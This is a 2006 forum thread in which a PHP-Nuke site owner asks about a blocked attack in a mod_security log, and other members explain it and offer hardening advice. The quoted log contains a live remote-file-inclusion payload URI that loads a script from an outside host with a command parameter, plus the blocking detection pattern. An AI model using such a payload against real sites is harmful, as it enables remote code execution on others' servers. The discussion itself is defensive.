Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Sat Jun 10, 2006 5:11 pm Reply with quote

Code:


[Sat Jun 10 16:41:05 2006] [error] [client x.x.x.x] mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.myhost.com"] [uri "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.panzergrenadiers.com/ss/tool25.dat?&list=1&cmd=id"]


I changed my host name to myhost and x'd out the IP address, but otherwise this is exactly what I happened to notice in my log today. What does this mean? It looks like my hosts server blocked it, not my Nuke or Sentinel. Correct?

If you look at the link
Only registered users can see links on this board! Get registered or login!

It appears to be some kind of defacing script.

What's going on here and who should I contact? Thanks.
 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Sat Jun 10, 2006 5:43 pm Reply with quote

Welcome to the club,yes these are simple tools they use on hundreds of websites everyday.
The attacks are usualy targeted towards forums,allmyguests,coppermine,gallery2 etc...and the list continues.
Most of the times it doesnt work but they are doing this by remote and hope someday they have a victim...
and theres nothing much you can do,but make sure you are secured and dont use any mods thats aren't secure..
 
View user's profile Send private message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Sat Jun 10, 2006 5:51 pm Reply with quote

That´s club member number 100.001 Smile Nice club.

403 in your log files means forbidden so there is nothing to do. Do a search here in the forum for AllMyGuests signin.php or cmd.
 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Sat Jun 10, 2006 9:23 pm Reply with quote

This site and defacing tool was in my log tonight when I checked it too. It was from a Turkish IP address and I had taken advantage of Nuke Sentinel and the import tool and IP2country tables to ban the whole country. You might want to look at that option unless you need Turkish users. There are a few countries where a lot of hacks come from. In the hack script that I looked at he includes another hack script from Brazil.

Just try to keep current with Sentinel and keep checking your logs and make sure no one has a back door into your site via the administrative interface provided by your host.
 
View user's profile Send private message Visit poster's website
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Sun Jun 11, 2006 10:14 am Reply with quote

While it's true that most of the script kiddies who use tools like this probably couldn't figure out how to spoof their IP address, it isn't that hard to do...

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©